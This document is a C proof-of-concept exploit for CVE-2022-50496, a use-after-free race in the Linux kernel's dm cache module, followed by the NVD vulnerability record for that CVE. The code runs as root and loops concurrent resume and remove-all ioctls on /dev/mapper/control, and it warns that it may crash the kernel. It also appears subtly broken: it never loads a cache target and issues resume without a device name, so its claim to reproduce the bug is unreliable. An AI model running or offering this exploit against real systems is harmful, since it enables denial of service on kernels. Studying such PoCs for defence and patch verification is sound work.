CVE-2022-50496

// CVE-2022-50496 PoC - dm cache UAF via concurrent dm_resume/dm_destroy // This PoC demonstrates the race condition between dm_resume() and dm_destroy() // that triggers a Use-After-Free in the dm cache module. // // Note: Requires root privileges to manipulate device-mapper devices. // Compile: gcc -o poc_cve_2022_50496 poc.c -lpthread #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <pthread.h> #include <sys/ioctl.h> #include <linux/dm-ioctl.h> #define DM_CLEAR_CMD 0x1 // Structure to hold DM ioctl data struct dm_ioctl_sync { struct dm_ioctl header; }; // Open device-mapper control device int dm_open(void) { int fd = open("/dev/mapper/control", O_RDWR); if (fd < 0) { perror("Cannot open /dev/mapper/control"); return -1; } return fd; } // Create a dm cache target via dmsetup-like interface int create_dm_cache(int fd, const char *name) { struct dm_ioctl *dmi = calloc(1, sizeof(struct dm_ioctl)); if (!dmi) return -1; dmi->version[0] = DM_VERSION_MAJOR; dmi->version[1] = DM_VERSION_MINOR; dmi->version[2] = DM_VERSION_PATCHLEVEL; dmi->data_size = sizeof(struct dm_ioctl); dmi->data_start = sizeof(struct dm_ioctl); strncpy(dmi->name, name, sizeof(dmi->name) - 1); dmi->flags = DM_PERSISTENT_DEV_FLAG; if (ioctl(fd, DM_CREATE_CMD, dmi) < 0) { perror("DM_CREATE failed"); free(dmi); return -1; } free(dmi); return 0; } // Resume the dm device (triggers timer setup) void *resume_thread(void *arg) { int fd = *(int *)arg; struct dm_ioctl dmi; memset(&dmi, 0, sizeof(dmi)); dmi.data_size = sizeof(dmi); dmi.data_start = sizeof(dmi); dmi.flags = DM_PERSISTENT_DEV_FLAG; while (1) { ioctl(fd, DM_RESUME_CMD, &dmi); usleep(1); } return NULL; } // Destroy the dm device (triggers UAF when concurrent with resume) void *destroy_thread(void *arg) { int fd = *(int *)arg; struct dm_ioctl dmi; memset(&dmi, 0, sizeof(dmi)); dmi.data_size = sizeof(dmi); dmi.data_start = sizeof(dmi); while (1) { ioctl(fd, DM_REMOVE_ALL_CMD, &dmi); usleep(1); } return NULL; } int main(int argc, char *argv[]) { int fd; pthread_t t1, t2; printf("[+] CVE-2022-50496 PoC - dm cache UAF\n"); printf("[+] Requires root privileges\n"); if (getuid() != 0) { fprintf(stderr, "[-] Must run as root\n"); return 1; } fd = dm_open(); if (fd < 0) return 1; // Create dm cache device if (create_dm_cache(fd, "cache_vuln") < 0) { close(fd); return 1; } printf("[+] Starting concurrent resume/destroy threads...\n"); printf("[+] This may crash the kernel due to UAF\n"); // Launch concurrent threads to trigger the race condition pthread_create(&t1, NULL, resume_thread, &fd); pthread_create(&t2, NULL, destroy_thread, &fd); pthread_join(t1, NULL); pthread_join(t2, NULL); close(fd); return 0; }

{"cve": {"id": "CVE-2022-50496", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:46.657", "lastModified": "2026-01-22T19:06:12.297", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm cache: Fix UAF in destroy()\n\nDm_cache also has the same UAF problem when dm_resume()\nand dm_destroy() are concurrent.\n\nTherefore, cancelling timer again in destroy()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.9", "versionEndExcluding": "4.9.337", "matchCriteriaId": "0E0273F2-224A-448F-92F6-D08F1E18B7CD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.87", "matchCriteriaId": "7B9E5B1C-CD46-4790-9500-615863850401"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.18", "matchCriteriaId": "08D38C5F-9644-4549-BBA6-F0860F024D14"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.4", "matchCriteriaId": "BC4189D9-5478-4E88-A78D-9C1DE29B217C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/034cbc8d3b47a56acd89453c29632a9c117de09d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2b17026685a270b2beaf1cdd9857fcedd3505c7e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2f097dfac7579fd84ff98eb1d3acd41d53a485f3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4d20032dd90664de09f2902a7ea49ae2f7771746", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a3e412c2ab131c54945327a7676b006f000a209", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a459d8edbdbe7b24db42a5a9f21e6aa9e00c2aa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6ac4f36910764cb510bafc4c3768544f86ca48ca", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/993406104d2b28fe470126a062ad37a1e21e792e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d2a0b298ebf83ab6236f66788a3541e91ce75a70", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}